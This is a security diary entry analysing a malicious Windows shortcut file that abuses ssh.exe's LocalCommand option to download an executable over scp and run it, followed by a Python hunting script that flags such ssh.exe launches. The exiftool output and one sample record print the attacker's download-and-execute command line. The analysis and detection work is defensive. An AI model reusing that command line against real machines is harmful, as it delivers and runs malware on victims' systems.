Christmas “Gift” Delivered Through SSH, (Fri, Dec 20th)

Christmas is at our door, and attackers use the holiday season to deliver ever more "gifts" to our mailboxes! I found this interesting file this morning: "christmas_slab.pdf.lnk"[1]. Link files (.lnk) are a classic way to execute something malicious on the victim's computer, but the technique used here is interesting.

A while ago, Microsoft added SSH support to Windows. I remember the first time I typed "ssh" into a command line and did not get the wonderful message:

'ssh' is not recognized as an internal or external command

Because ssh is available on many computers today, attackers have a new way to deliver malicious content using the SSH (read: SCP) protocol. That's the technique used by today's LNK file:

remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk 
ExifTool Version Number         : 12.76
File Name                       : christmas_slab.pdf.lnk
Directory                       : .
File Size                       : 1992 bytes
File Modification Date/Time     : 2024:12:20 05:39:50-05:00
File Access Date/Time           : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time     : 2024:12:20 05:39:50-05:00
File Permissions                : -rwx------
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes                 : Archive
Create Date                     : 2024:10:09 05:37:10-04:00
Access Date                     : 2024:11:05 07:47:23-05:00
Modify Date                     : 2024:10:09 05:37:10-04:00
Target File Size                : 1243648
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Target File DOS Name            : ssh.exe
Drive Type                      : Fixed Disk
Drive Serial Number             : 280C-1822
Volume Label                    : 
Local Base Path                 : C:\Windows\System32\OpenSSH\ssh.exe
Relative Path                   : ..\..\..\Windows\System32\OpenSSH\ssh.exe
Working Directory               : C:\Program Files (x86)\Microsoft\Edge\Application
Command Line Arguments          : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17[.]43[.]12[.]31
Machine ID                      : christmas-destr

This LNK file spawns ssh.exe, which transfers a PE file and executes it: with PermitLocalCommand=yes, ssh runs the LocalCommand on the local machine, so scp fetches the file and the second half of the command launches it. Note the nice executable filename! Once started, the same IP address and username are passed as parameters to the malicious payload. Unfortunately, the SSH server is down and I wasn't able to retrieve the file.
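To show how a hunting rule for this pattern can look, here is an added example (my own code, not part of the original diary or of any tool mentioned in it). It parses the ssh.exe command line the way ssh itself reads `-o` options, scores the combination of PermitLocalCommand, LocalCommand, ProxyCommand and StrictHostKeyChecking, and extracts the remote hosts referenced. The process-creation records are constructed, Sysmon-style samples; the IP addresses (192.0.2.x, TEST-NET) and the parent images are placeholders, not values from the diary.

```python
"""Hunting helper: flag ssh.exe launches that abuse LocalCommand/ProxyCommand to run code locally."""
import re
import shlex

# ssh(1) flags that consume the following token as their argument; they must not be
# mistaken for positional arguments such as the destination.
FLAGS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")

# Constructed sample records modelled on Sysmon Event ID 1 fields (hypothetical values).
SAMPLE_EVENTS = [
    {   # the pattern from the diary, with a TEST-NET address instead of the real one
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Program Files (x86)\Microsoft\Edge\Application",
        "CommandLine": (r'"C:\Windows\System32\OpenSSH\ssh.exe" -o "PermitLocalCommand=yes" '
                        r'-o "StrictHostKeyChecking=no" -o "LocalCommand=scp '
                        r'root@192.0.2.10:/home/revenge/christmas-sale.exe c:\users\public\. '
                        r'&& c:\users\public\christmas-sale.exe" revenge@192.0.2.10'),
    },
    {   # an administrator's interactive session
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'"C:\Windows\System32\OpenSSH\ssh.exe" -p 2222 admin@192.0.2.20',
    },
    {   # a build agent that disables host-key checking (noisy, but no local command)
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\agent\runner.exe",
        "CommandLine": r"ssh.exe -o StrictHostKeyChecking=no -i C:\keys\deploy deploy@192.0.2.30",
    },
]


def _unquote(tok):
    """Strip one pair of surrounding quotes that shlex non-POSIX mode leaves in place."""
    if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
        return tok[1:-1]
    return tok


def parse_ssh_cmdline(cmdline):
    """Split an ssh command line into (options, positional) roughly as ssh sees it.

    Option names are lower-cased because ssh treats them case-insensitively. shlex runs
    in non-POSIX mode so Windows backslashes survive; this approximates, rather than
    reproduces, the Windows argument-splitting rules, which is adequate for hunting.
    """
    tokens = shlex.split(cmdline, posix=False)
    if tokens and re.split(r"[\\/]", _unquote(tokens[0]).lower())[-1] in ("ssh", "ssh.exe"):
        tokens = tokens[1:]                          # drop the program name
    options, positional = {}, []
    i = 0
    while i < len(tokens):
        tok = _unquote(tokens[i])
        if tok == "-o" and i + 1 < len(tokens):     # -o Key=value
            key, _, val = _unquote(tokens[i + 1]).partition("=")
            options[key.strip().lower()] = val.strip()
            i += 2
        elif tok.startswith("-o") and len(tok) > 2:  # -oKey=value
            key, _, val = tok[2:].partition("=")
            options[key.strip().lower()] = val.strip()
            i += 1
        elif len(tok) == 2 and tok[0] == "-" and tok[1] in FLAGS_WITH_ARG:
            i += 2                                    # flag plus its argument
        elif tok.startswith("-"):
            i += 1                                    # boolean flag such as -v or -N
        else:
            positional.append(tok)
            i += 1
    return options, positional


def assess_ssh_event(event):
    """Score one process-creation record for client-side command execution via ssh options."""
    options, positional = parse_ssh_cmdline(event["CommandLine"])
    score, reasons = 0, []
    local_cmd = options.get("localcommand")
    if local_cmd and options.get("permitlocalcommand", "").lower() == "yes":
        score += 50
        reasons.append("PermitLocalCommand=yes with LocalCommand: command runs on the client")
    elif local_cmd:
        score += 20
        reasons.append("LocalCommand present (inert without PermitLocalCommand, but unusual)")
    if "proxycommand" in options:                     # also executed locally by ssh
        score += 40
        reasons.append("ProxyCommand executes a local command")
    if options.get("stricthostkeychecking", "").lower() == "no":
        score += 10
        reasons.append("StrictHostKeyChecking=no: unknown server accepted silently")
    if local_cmd and any(m in local_cmd.lower() for m in ("scp ", ".exe", "powershell", "&&")):
        score += 20
        reasons.append("LocalCommand downloads or launches a program")
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        score += 10
        reasons.append("Parent is explorer.exe: typical of a double-clicked .lnk")
    hosts = set(re.findall(r"[\w.-]+@([\w.-]+)", event["CommandLine"]))  # user@host targets
    return {"score": score, "reasons": reasons, "hosts": hosts,
            "destination": positional[-1] if positional else None}


def hunt(events, threshold=50):
    """Return (image, score, reasons, hosts) for events at or above the threshold, highest first."""
    hits = []
    for ev in events:
        result = assess_ssh_event(ev)
        if result["score"] >= threshold:
            hits.append((ev["Image"], result["score"], result["reasons"], result["hosts"]))
    return sorted(hits, key=lambda h: -h[1])


if __name__ == "__main__":
    for image, score, reasons, hosts in hunt(SAMPLE_EVENTS):
        print(f"{score:3d} {image} hosts={sorted(hosts)}")
        for r in reasons:
            print("     -", r)
```

The weights are arbitrary starting points; the key signal is PermitLocalCommand=yes combined with a LocalCommand (or any ProxyCommand), which has no normal reason to appear in a command line launched from Explorer. Disabling host-key checking alone is common in automation and only nudges the score.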

Something else suspicious: the IP belongs to Apple:

NetRange:       17.0.0.0 - 17.255.255.255
CIDR:           17.0.0.0/8
NetName:        APPLE-WWNET
NetHandle:      NET-17-0-0-0-1
Parent:          ()
NetType:        Direct Allocation
OriginAS:
Organization:   Apple Inc. (APPLEC-1-Z)
RegDate:        1990-04-16
Updated:        2023-11-15
Comment:        Geofeed https://ip-geolocation.apple.com
Ref:            https://rdap.arin.net/registry/ip/17.0.0.0

I discovered this file because I started tracking the use of "ssh.exe" in my hunting rules. Let's hope I will get more hits soon!

[1] https://www.virustotal.com/gui/file/8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.